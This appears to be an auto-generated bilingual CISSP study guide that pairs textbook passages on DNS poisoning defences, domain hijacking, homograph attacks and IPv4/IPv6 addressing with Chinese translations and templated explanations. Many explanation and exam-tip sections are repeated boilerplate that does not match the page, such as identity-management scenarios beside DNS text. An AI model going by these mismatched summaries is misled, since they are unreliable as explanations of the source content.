Although there are many DNS poisoning methods, here are some basic security measures you can take that can greatly reduce their threat: Limit zone transfers from internal DNS servers to external DNS servers. This is accomplished by blocking inbound TCP port 53 (zone transfer requests) and UDP port 53 (queries). Require internal clients to resolve all domain names through the internal DNS. This will require that you block outbound UDP port 53 (for queries) while keeping open outbound TCP port 53 (for zone transfers). Limit the external DNS servers from which internal DNS servers pull zone transfers. Deploy a network intrusion detection system (NIDS) to watch for abnormal DNS traffic.

Properly harden all DNS, server, and client systems in your private network. Use DNSSEC to secure your DNS infrastructure. Use DoH or OdoH on all clients where supported. There is no easy patch or update that will prevent these exploits from being waged against a client. This is due to the fact that these attacks take advantage of the normal and proper mechanisms built into various protocols,

中文直译 / 整理

组织应使用split-DNS系统(又称split-horizon DNS、split-view DNS和 split-brain DNS)。 split‑DNS是指部署一个用于公共用途的DNS服务器和一 个单独用于内部用途的DNS服务器。 公共DNS服务器上的区域文件中的所有数 据均可通过查询或探测被公众访问。 然而,内部DNS仅限内部使用。 只有内部 系统被授权与内部DNS服务器交互。 通过阻止TCP和UDP的入站53端口,禁止 外部人员访问内部DNS服务器。 TCP 53用于区域传输(包括大多数DNS服务器 之间的通信),UDP 53用于查询(即任何非DNS系统向DNS服务器发送查询)。 内部系统可配置为仅与内部DNS服务器交互,或允许向外部DNS服务器发送查 询(这要求防火墙为状态检测防火墙,并配置为允许来自经批准的出站查询的 响应返回至内部系统)。 尽管存在多种DNS欺骗方法,但您可以采取一些基本的安全措施来大幅降低 其威胁: 限制内部DNS服务器向外部DNS服务器进行区域传输。 这可以通过阻止 入站TCP端口53(区域传输请求)和UDP端口53(查询)来实现。 要求内部客户端通过内部DNS解析所有域名。

这需要您阻止出站UDP端口 53(用于查询),同时保持出站TCP端口53(用于区域传输)开放。 限制 内部DNS服务器从中获取区域传输的外部DNS服务器。 部署网络入侵检测系统(NIDS)以监控异常的DNS流量。 妥善加固您私有网络中的所有DNS、服务器和客户端系统。 使用DNSSEC来保护您的DNS基础设施。 在所有支持的客户端上使用DoH或OdoH。 没有简单的补丁或更新能够防止这些针对客户端的攻击。 这是因为这些攻击利 用了各种协议中内置的正常且正确的机制,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 28 / PDF P746

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

services, and applications. Thus, the defense is more of a detection and preventive concern. Install both HIDS and NIDS tools to watch for abuses of these types. Regularly review the logs of your DNS and DHCP systems, as well as local client system logs and potentially firewall, switch, and router logs for entries indicating abnormal or questionable occurrences. Another DNS defense mechanism is a DNS sinkhole. A DNS sinkhole is a specific example of a false telemetry system (aka sinkhole server, internet sinkhole, and blackhole DNS). This technique is effectively DNS spoofing used as a defense.

A DNS sinkhole attempts to provide false responses to DNS queries from malware, such as bots, to prevent access to command and control systems. It can also be used to protect users from visiting known malicious or phishing sites. Thus, DNS sinkholes can be used for both malicious and benign/investigative/defensive purposes. Domain Hijacking Domain hijacking, or domain theft, is the malicious action of changing the registration of a domain name without the authorization of the valid owner. This may be accomplished by stealing the owner's logon credentials, using XSRF, hijacking a session, using an AitM attack, or exploiting a flaw in the domain registrar's systems.

An example of a domain hijack is the theft of the fox-it.com domain; you can read about this attack at http://blog.fox-it.com/2017/12/14/lessonslearned-from-a-man-in-the-middle-attack. Sometimes, when another person registers a domain name immediately after the original owner's registration expires, it is called domain hijacking, but it shouldn't be. This is a potentially unethical practice, but it is not an actual hack or attack. It is taking advantage of the oversight of the original owner's failure to manually extend their registration or configure auto-renewal.

If an original owner loses their domain name by failing to maintain registration, there is often no recourse other than to contact the new owner and ask about reobtaining control. When an organization loses its domain and someone else takes over control, this can be a devastating event both to the organization and its customers and visitors. The new FQDN owner might host completely different content or a false duplicate of the previous site. This later activity might result in fooling visitors, similar to a phishing attack, where personally identifiable information (PII) might be extracted and collected.

中文直译 / 整理

服务和应用程序。 因此,防御更侧重于检测和预防。 请安装HIDS和NIDS工 具以监控此类滥用行为。 定期审查您的DNS和DHCP系统日志,以及本地客户 端系统日志,还有可能的防火墙、交换机和路由器日志,以查找表明异常或可 疑事件的记录。 另一种DNS防御机制是DNS黑洞。 DNS黑洞是虚假遥测系统(又称黑洞服务器、 互联网黑洞和黑洞DNS)的一个具体示例。 该技术本质上是用作防御手段的 DNS欺骗。 DNS黑洞试图向恶意软件(如僵尸网络)的DNS查询提供虚假响应, 以阻止其访问命令与控制系统。 它还可用于保护用户免受访问已知恶意或钓鱼 网站的威胁。 因此,DNS黑洞既可用于恶意目的,也可用于良性/调查/防御性目 的。 域名劫持 域名劫持,或域名窃取,是指在未经合法所有者授权的情况下更改域名注册 的恶意行为。 这可能通过窃取所有者的登录凭证、利用XSRF、劫持会话、使 用AitM攻击或利用域名注册商系统中的漏洞来实现。 域名劫持的一个例子是fox-it.com域名的被盗; 您可以在 http://blog.fox‑it.com/2017/12/14/lessons‑ 从中间人攻击中学到的。

有时,当另一个人在原始所有者注册到期后立即注册了该域名,这被称为域名 劫持,但这种说法并不恰当。 这是一种潜在不道德的行为,但并非真正的黑客 行为或攻击。 它只是利用了原始所有者未能手动延长注册或配置自动续费的疏 忽。 如果原始所有者因未维持注册而失去域名,通常除了联系新所有者并询问 如何重新获得控制权外,别无他法。 当一个组织失去其域名,而其他人接管了控制权时,这可能对该组织及其客户 和访客造成毁灭性影响。 新的FQDN所有者可能会托管与之前网站完全不同的 内容,或虚假的复制品。 这种后续行为可能导致欺骗访客,类似于钓鱼攻击, 其中可能提取和收集个人身份信息(PII)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 29 / PDF P747

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

The best defense against domain hijacking is to use strong multifactor authentication when logging into your domain registrar. To defend against letting your domain registration lapse, set up auto-renew and double-check the payment method a week before the renewal date. Homograph Attack Another DNS, address, or hyperlink concern is that of the homograph attack. These attacks leverage similarities in character sets to register phony international domain names (IDNs) that to the naked eye appear legitimate. For example, in many fonts, some letters in Cyrillic look like Latin characters; for example, the l (i.e., lowercase L) in Latin looks like the Palochka Cyrillic letter.

Thus, domain names of apple.com and paypal.com might look valid as Latin characters but could actually include Cyrillic characters that, when resolved, direct you to a different site than you intended. For a thorough discussion of the homograph attack, see http://blog.malwarebytes.com/101/2017/10/out-of-character-homographattacks-explained. See Chapter 2, “Personnel Security and Risk Management Concepts,” for social engineering topics of typosquatting, URL hijacking, and clickjacking, which are also related to domain name poisoning or spoofing.

Internet Protocol (IP) Networking Another important protocol in the TCP/IP protocol suite operates at the Network Layer of the OSI model, namely, Internet Protocol (IP). IP provides route addressing for data packets. It is this route addressing that is the foundation of global internet communications because it provides a means of identity and prescribes transmission paths. Similar to UDP, IP is connectionless and is an unreliable communication service. IP does not offer guarantees that packets will be delivered or that packets will be delivered in the correct order, and it does not guarantee that packets will be delivered only once.

However, it was designed to perform “best effort” in finding a path or route to a destination in spite of a damaged or corrupted network structure.

中文直译 / 整理

防范域名劫持的最佳方法是在登录域名注册商时使用强多重身份验证。 为防 止域名注册过期,请设置自动续费,并在续费日期前一周再次核对支付方式。 同形异义攻击 另一个与DNS、地址或超链接相关的问题是同形异义攻击。 这些攻击利用字符 集的相似性,注册看似合法的虚假国际域名(IDN)。 例如,在许多字体中, 西里尔字母的一些字符看起来像拉丁字符; 例如,拉丁字母中的小写l(即字母 L)看起来像西里尔字母的Palochka。 因此,apple.com和paypal.com这样的域 名可能在视觉上看起来是拉丁字符,但实际上可能包含西里尔字符,当解析时 会将您引导至与预期不同的网站。 有关同形异义攻击的详细讨论,请参阅 http://blog.malwarebytes.com/101/2017/10/out-of-character-homographattacks-explained. 参见第2章“人员安全与风险管理概念”,了解与域名投毒或欺骗相 关的社会工程学主题,如错字域注册、URL劫持和点击劫持。 互联网协议(IP)网络 TCP/IP协议套件中的另一个重要协议在OSI模型的网络层运行,即互联网协议 (IP)。

IP为数据包提供路由寻址。 正是这种路由寻址构成了全球互联网通信 的基础,因为它提供了身份标识并规定了传输路径。 与UDP类似,IP是无连接 的,是一种不可靠的通信服务。 IP不保证数据包一定会被送达,也不保证数据 包会按正确顺序送达,更不保证数据包只会被送达一次。 然而,它的设计目标 是在网络结构受损或损坏的情况下,仍能尽力找到通往目的地的路径或路由。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

ISO 偏标准和管理体系。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 30 / PDF P748

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Thus, you must employ TCP with IP to gain reliable and controlled communication sessions. IPv4 vs. IPv6 IPv4 is the version of Internet Protocol that is most widely used around the world. However, IPv6 is being rapidly adopted for both private and public network use. IPv4 uses a 32-bit addressing scheme, whereas IPv6 uses 128 bits for addressing. IPv6 offers many new features that are not available in IPv4. Some of IPv6's new features are scoped addresses, autoconfiguration, and quality of service (QoS) priority values. Scoped addresses give administrators the ability to group and then block or allow access to network services, such as file servers or printing.

Autoconfiguration theoretically removes the need for traditional DHCP and network address translation (NAT). However, DHCPv6 and NAT66 exist (see Chapter 12 for NAT66). QoS priority values allow for traffic management based on prioritized content. Also, IPSec is native to IPv6, but it is an add-on for IPv4. DHCPv6 has two modes of operation. In stateful mode, DHCPv6 assigns specific IPv6 addresses to devices and manages the allocation of network configuration parameters. This mode is similar to the operation of DHCP in IPv4 networks. In stateless mode, DHCPv6 provides network configuration parameters without assigning specific IPv6 addresses.

Devices may use Stateless Address Autoconfiguration (SLAAC) to generate their own addresses. SLAAC is based on routers periodically sending Router Advertisement (RA) messages to the local network segment. The RA messages include information about the network prefix that devices should use when forming their IPv6 addresses. The second element used to craft an IPv6 address is the interface identifier, which is typically derived from the Media Access Control (MAC) address of the network interface on the device. However, to enhance privacy, some implementations may use techniques like “privacy extensions” to generate random interface identifiers.

The combination of the network prefix and the interface identifier results in a self-assigned unique IPv6 address for each device.

中文直译 / 整理

因此,您必须将TCP与IP结合使用,以实现可靠且受控的通信会话。 IPv4 与 IPv6 IPv4 是全球最广泛使用的互联网协议版本。 然而,IPv6 正在被迅速用于私有 和公共网络。 IPv4 使用 32 位寻址方案,而 IPv6 使用 128 位寻址。 IPv6 提供 了许多 IPv4 不具备的新功能。 IPv6 的一些新功能包括作用域地址、自动配置 和服务质量(QoS)优先级值。 作用域地址使管理员能够对网络服务(如文件 服务器或打印服务)进行分组,然后阻止或允许访问。 自动配置理论上消除了 对传统 DHCP 和网络地址转换(NAT)的需求。 然而,DHCPv6 和 NAT66 仍然存在(参见第 12 章 了解 NAT66)。 QoS 优先级值允许基于优先 级内容进行流量管理。 此外,IPSec 是 IPv6 的原生功能,但对 IPv4 来说却 是附加功能。 DHCPv6 有两种操作模式。 在有状态模式下,DHCPv6 为设备分配特定的 IPv6 地址并管理网络配置参数的分配。 此模式与 IPv4 网络中 DHCP 的操作 类似。 在无状态模式下,DHCPv6 提供网络配置参数,但不分配特定的 IPv6 地址。

设备可使用无状态地址自动配置(SLAAC)来自行生成地址。 SLAAC 基于路由器定期向本地网络段发送路由器公告(RA)消息。 RA 消息 包含设备在形成 IPv6 地址时应使用的网络前缀信息。 用于构建 IPv6 地址的第 二个元素是接口标识符,通常从设备网络接口的媒体访问控制(MAC)地址 派生。 然而,为了增强隐私性,某些实现可能会使用“隐私扩展”等技术生成 随机的接口标识符。 网络前缀与接口标识符的组合为每个设备生成一个自分配 的唯一 IPv6 地址。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

IPS 放在线路中,误报可能影响可用性。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 31 / PDF P749

第 749 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

IPv4 has an equivalent concept to that of IPv6's QoS, which is named Type of Service (ToS). However, ToS seemed to go unused and was converted into the Differentiated Services (DS) by a later specification. The DS field offers a variety of definable characteristics that can be used to manage traffic flow. However, it still does not seem to have widespread use or support by network devices, which would perform such management. There is promise that IPv6 networks will include more common support and actually provide for traffic prioritization based on IPv6 header values. IPv6 is supported by most operating systems released since 2000. For most OSs today, native IPv6 is standard.

While the initial deployment of IPv6, both privately and publicly, has been slow, at the start of 2024, over 42 percent of Internet IP traffic was IPv6-based. For a glimpse into the status of IPv4 to IPv6 conversion on the Internet from Google's perspective, see the IPv6 statistics at www.google.com/intl/en/ipv6/statistics.html. The transition or migration to IPv6 raises several security concerns. One issue is that with the larger 128-bit address space, there are many more addresses that attackers can use as source addresses; thus, IP filtering and block lists will be less effective as attackers can just use a different address to get past the filter.

A second issue is that secure deployment of IPv6 requires that all security filtering and monitoring products be upgraded to fully support IPv6 prior to enabling the protocol on the production network. Otherwise, IPv6 will serve as a covert channel, as it will be unmonitored and unfiltered. The means by which IPv6 and IPv4 can coexist on the same network is to use one or more of three primary options: dual stack, tunneling, or NAT-PT. Dual stack means having systems operate both IPv4 and IPv6 and using the appropriate protocol for each conversation.

Tunneling allows most systems to operate a single stack of either IPv4 or IPv6 and use an encapsulation tunnel to access systems of the other protocol. Network Address TranslationProtocol Translation (NAT-PT) (RFC-2766) can be used to convert between IPv4 and IPv6 network segments similar to how NAT converts between internal and external addresses. See Chapter 12 on NAT66. IPv4

中文直译 / 整理

具有与 IPv6 的 QoS 相当的概念,称为服务类型(ToS)。 然而, ToS 似乎未被使用,后来的规范将其转换为区分服务(DS)。 DS 字段提供 了多种可定义的特性,可用于管理流量流。 然而,网络设备似乎仍缺乏广泛 使用或支持来执行此类管理。 有理由相信,IPv6 网络将提供更普遍的支持, 并实际基于 IPv6 报头值实现流量优先级划分。 自2000年以来发布的大多数操作系统都支持IPv6。 如今,对于大多数操作系统 而言,原生IPv6已成为标准。 尽管IPv6在私有和公共领域的初始部署进展缓慢, 但在2024年初,超过42%的互联网IP流量基于IPv6。 要了解谷歌视角下互联网 从IPv4到IPv6转换的现状,请参阅IPv6统计数据: www.google.com/intl/en/ipv6/statistics.html。 过渡到IPv6引发了若干安全问题。 其中一个问题是,由于128位地址空间更大, 攻击者可以使用更多地址作为源地址; 因此,IP过滤和黑名单的有效性将降低, 因为攻击者只需使用不同的地址即可绕过过滤。

第二个问题是,安全部署IPv6要求在生产网络上启用该协议之前,所有安全 过滤和监控产品都必须升级以全面支持IPv6。 否则,IPv6将充当隐蔽通道, 因为它将未经监控和过滤。 IPv6 和 IPv4 在同一网络中共存的方式是使用以下三种主要选项之一或多个: 双栈、隧道技术或 NAT‑PT。 双栈意味着系统同时运行 IPv4 和 IPv6,并为每 次通信使用相应的协议。 隧道技术允许大多数系统仅运行 IPv4 或 IPv6 单一协 议栈,并通过封装隧道访问另一种协议的系统。 网络地址转换‑协议转换( NAT‑PT)(RFC‑2766)可用于在 IPv4 和 IPv6 网络段之间进行转换,类似 于 NAT 在内部和外部地址之间的转换。 参见 第 12 章 关于 NAT66。

小白解释

场景先行:你是公司的安全负责人,正在读第 749 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 749 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 32 / PDF P750

第 750 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

For those organizations still reluctant to deploy IPv6 internally, they might consider IPv6 at the edge. This is a configuration where IPv6 is only supported on the boundary devices connected directly to the Internet. This enables communications over the Internet using IPv6, while using IPv4 internally. Both IPv4 and IPv6 have a header field that is used to control or limit infinite transmission. The time to live (TTL) field of IPv4 and the hop limit field of IPv6 are decremented by routers until it reaches zero (0). Once that occurs, the packet is discarded and an ICMP Type 11 Timeout Exceeded error message is sent back to the origin.

IP Classes Basic knowledge of IPv4 addressing and IPv4 classes is a must for any security professional. If you are rusty on IPv4 addressing, subnetting, classes, and other related topics, take the time to refresh your knowledge. Table 11.1 and Table 11.2 provide a quick overview of the key details of classes and default subnets. A full Class A subnet supports 16,777,214 hosts; a full Class B subnet supports 65,534 hosts; and a full Class C subnet supports 254 hosts. Class D is used for multicasting, whereas Class E is reserved for experimental and future use.

TABLE 11.1 IP classes ClassFirst binary digitsDecimal range of first octet A 0 1–126 B 10 128–191 C 110 192–223 D 1110 224–239 E 1111 240–255

中文直译 / 整理

对于那些仍不愿在内部部署 IPv6 的组织,他们可以考虑在边缘部署 IPv6。 这是一种仅在直接连接到互联网的边界设备上支持 IPv6 的配置。 这使得可 以通过 IPv6 进行互联网通信,同时在内部仍使用 IPv4。 IPv4 和 IPv6 都有一个用于控制或限制无限传输的头部字段。 IPv4 的 生存时间(TTL) 字段和 IPv6 的 跳数限制 字段由路由器递减,直到达到 零(0)。 一旦发生这种情况,数据包将被丢弃,并向源地址发送一个 ICMP 类型 11 超时超出错误消息。 IP 类 任何安全专业人员都必须掌握 IPv4 寻址和 IPv4 类别的基本知识。 如果您对 IPv4 寻址、子网划分、类别及其他相关主题有所遗忘,请花时间复习这些知识。 表 11.1 和 表 11.2 提供了类和默认子网关键细节的快速概览。 一个完整的 A 类 子网支持 16,777,214 个主机; 一个完整的 B 类子网支持 65,534 个主机; 一个 完整的 C 类子网支持 254 个主机。 D 类用于组播,而 E 类保留用于实验和未 来用途。

表 11.1 IP 类别 类别 第一个二进制数字 第一个八位组的十进制范围 A 0 1–126 B 10 128–191 C 110 192–223 D 1110 224–239 E 1111 240–255

小白解释

场景先行:你是公司的安全负责人,正在读第 750 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 750 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 33 / PDF P751

第 751 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

TABLE 11.2 IP classes' default subnet masks ClassDefault subnet maskCIDR equivalent A 255.0.0.0 /8 B 255.255.0.0 /16 C 255.255.255.0 /24 Note that the entire Class A network of 127 was set aside for the loopback address, although only a single address is actually needed for that purpose. A Class A network of 0 is defined as the blackhole network where traffic is routed to be thrown away and discarded. The loopback address for IPv4 is any address in the Class A subnet of 127.0.0.1–127.255.255.254, even though only the address of 127.0.0.1 is typically used.

When an interface is configured for loopback, a subnet mask is not defined; it will use 255.255.255.255 by default, although some will document this as 127.0.0.0/8. Also note that under IPv4, the first address of a subnet is reserved as the network address (i.e., 127.0.0.0) and the last for the directed broadcast (i.e., 127.255.255.255) and, therefore, not directly usable as a host address (or in this case a loopback address). The IPv6 loopback is not a specific address—it is a notation: ::1/128 or ::1%128. The original class-based grouping of IPv4 addresses is no longer strictly adhered to.

Instead, a more flexible system has been adopted based on variable length subnet masking (VLSM) and Classless Inter-Domain Routing (CIDR). CIDR provides for a subnet masking notation that uses mask bit counts rather than a full dotted-decimal notation subnet mask. Thus, instead of 255.255.0.0, a CIDR notation is added to the IP address after a slash, as in 172.16.1.1/16, for example. One significant benefit of CIDR over traditional subnet-masking techniques is the ability to combine multiple noncontiguous sets of addresses into a single subnet. For example, it is possible to combine several Class C subnets into a single larger subnet grouping.

If CIDR piques your interest, see IETF's RFC for CIDR at http://tools.ietf.org/html/rfc4632. ICMP

中文直译 / 整理

表 11.2 IP 类别的默认子网掩码 类别 默认子网掩码 CIDR 等价表示 A 255.0.0.0 /8 B 255.255.0.0 /16 C 255.255.255.0 /24 请注意,整个 127 的 A 类网络被预留用于环回地址,尽管该目的实际上仅需一 个地址即可。 0 的 A 类网络被定义为黑洞网络,其中流量被路由后丢弃。 IPv4 的回送地址是 127.0.0.1–127.255.255.254 这个 A 类子网中的任 何地址,尽管通常仅使用 127.0.0.1 这个地址。 当接口配置为回送时,不定 义子网掩码; 它将默认使用 255.255.255.255,尽管有些文档会将其记录 为 127.0.0.0/8。 另外请注意,在 IPv4 中,子网的第一个地址被保留为网 络地址(即 127.0.0.0),最后一个地址用于定向广播(即 127.255.255.255),因此不能直接用作主机地址(或在此情况下用作回送 地址)。 IPv6 的回送地址不是一个特定的地址——它是一种表示法::: 1/128 或 ::1%128。 IPv4地址的原始基于类别的分组方式已不再严格遵循。

相反,已采用一种基于 可变长度子网掩码(VLSM)和无类别域间路由(CIDR)的更灵活系统。 CIDR提供了一种子网掩码表示法,使用掩码位数而非完整的点分十进制子网掩 码。 因此,不是使用255.255.0.0,而是在IP地址后添加一个斜杠和CIDR表示 法,例如172.16.1.1/16。 CIDR相对于传统子网掩码技术的一个重要优势是能够 将多个非连续的地址集合合并为一个子网。 例如,可以将多个C类子网合并为一 个更大的子网组。 如果CIDR引起了您的兴趣,请参阅IETF关于CIDR的RFC文 档: http://tools.ietf.org/html/rfc4632. ICMP

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

